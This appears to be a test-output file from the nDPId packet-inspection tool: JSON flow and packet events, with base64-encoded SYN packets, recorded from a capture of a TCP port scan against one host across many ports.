-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAstzAAADsGVkKsEAAIQA2GNIzSJpTdUoMYAAAAAGACEAAB+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAshrwAADsGhrasEAAIQA2GNIzSAS3dUoMYAAAAAGACEAAnYgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAscvcAADcGnnusEAAIQA2GNIzSBDbdUoMYAAAAAGACEAAkWQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6vkAADMGKnmsEAAIQA2GNIzTPpDdU4MZAAAAAGACEADp+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsHf8AADQG9nOsEAAIQA2GNIzTBPfdU4MZAAAAAGACBAAvlQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs+ZUAAC4GIN2sEAAIQA2GNIzTIADdU4MZAAAAAGACDAAMjAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIsAACoGYeesEAAIQA2GNIzTySXdU4MZAAAAAGACDABjZgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs728AAC8GKgOsEAAIQA2GNIzTACrdU4MZAAAAAGACEAAoYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2IAACsGfhCsEAAIQA2GNIzTdTDdU4MZAAAAAGACEACzWwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsaiIAADUGqVCsEAAIQA2GNIzTEyTdU4MZAAAAAGACCAAdaAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADEGgdysEAAIQA2GNIzTD5vdU4MZAAAAAGACCAAg8QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAADgGTEqsEAAIQA2GNIzTBBzdU4MZAAAAAGACBAAwcAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6LcAADgGJ7usEAAIQA2GNIzTBD7dU4MZAAAAAGACBAAwTgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsmusAACsGgoesEAAIQA2GNIzTDdrdU4MZAAAAAGACEAAasgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN8AADAGE5SsEAAIQA2GNIzTTYLdU4MZAAAAAGACBADnCQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6BkAADcGKVmsEAAIQA2GNIzTS3PdU4MZAAAAAGACEADdGAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAspmYAACkGeQysEAAIQA2GNIzTBMLdU4MZAAAAAGACCAArygAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsgl0AACUGoRWsEAAIQA2GNIzSAG3dUoMYAAAAAGACCAAwIgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsoOwAACYGgYasEAAIQA2GNIzSB8\/dUoMYAAAAAGACDAAkwAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3VgAACgGQxqsEAAIQA2GNIzSEB3dUoMYAAAAAGACBAAkcgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zgAADQGNTqsEAAIQA2GNIzSL+ndUoMYAAAAAGACBAAEpgAAAgQFtA=="} 